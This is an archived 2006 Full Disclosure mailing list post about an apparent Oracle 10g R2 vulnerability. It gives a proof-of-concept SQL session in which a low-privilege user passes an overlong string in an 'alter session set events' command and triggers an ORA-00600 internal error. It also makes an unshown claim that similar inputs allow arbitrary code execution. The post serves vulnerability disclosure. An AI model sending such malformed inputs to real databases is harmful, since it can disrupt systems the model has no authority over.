Full Disclosure mailing list archives
Oracle 10g R2 and, probably, all previous versions
From: "putosoft softputo" <hasecorp () hotmail com>
Date: Thu, 27 Jul 2006 19:23:41 +0000
I can't believe it. Oracle releases new patches and they have not been solved one of the main problems: A user with only the SELECT privilege can do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!!
I'm not sure if is time to full disclosure it but, anyway, I will "full disclosure" one inocent issue, an integer overflow:
Example: --Connect with any user with only CREATE SESSION SQL> alter session set events '10046 trace name context forever, level 16'; Session altered.SQL> alter session set events '10046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004610046100461004 61004610046100461004610046100461004610046100461004610046100461004610046100461004610046trace name context forever, level 16';
ERROR:ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], []
It's not even a crash but (be sure) that there are other "combinations" that makes it vulnerable to integer overflows allowing the execution of arbritrary code.
PD: Hello Mary Ann! Are you on holidays? _________________________________________________________________Grandes éxitos, superhéroes, imitaciones, cine y TV... http://es.msn.kiwee.com/ Lo mejor para tu móvil.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Oracle 10g R2 and, probably, all previous versions putosoft softputo (Jul 27)
- chaseonline security Geo. (Jul 28)
- <Possible follow-ups>
- Oracle 10g R2 and, probably, all previous versions Russell Lowenthal (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions rjamya (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions Russell Lowenthal (Jul 28)
- Re: Oracle 10g R2 and, probably, all previous versions rjamya (Jul 28)